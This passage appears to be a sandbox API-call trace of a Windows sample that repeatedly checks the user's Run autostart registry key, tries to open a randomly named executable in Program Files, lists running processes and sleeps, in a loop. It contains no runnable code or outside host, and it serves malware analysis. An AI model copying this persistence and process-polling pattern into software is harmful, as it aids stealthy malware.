Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.142] NtClose (Handle=0x14c) returned 0x0 [0265.142] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.142] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.142] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.142] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.142] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.142] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.239] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.251] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.251] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.251] NtClose (Handle=0x14c) returned 0x0 [0265.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.251] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.252] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.252] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.252] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.252] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.374] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.377] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.377] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.378] NtClose (Handle=0x14c) returned 0x0 [0265.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.378] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.378] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.378] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.378] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.502] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.516] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.516] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.516] NtClose (Handle=0x14c) returned 0x0 [0265.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.517] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.517] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.517] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.517] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.603] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.609] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.610] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.610] NtClose (Handle=0x14c) returned 0x0 [0265.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.610] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.610] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.610] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.610] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.703] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.718] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.720] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.720] NtClose (Handle=0x14c) returned 0x0 [0265.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.720] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.720] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.720] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.720] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.814] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.832] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.833] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.833] NtClose (Handle=0x14c) returned 0x0 [0265.833] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.833] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.833] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.833] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.833] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.833] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.926] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.937] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.938] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.938] NtClose (Handle=0x14c) returned 0x0 [0265.938] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.938] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.938] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.938] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.938] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.938] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, 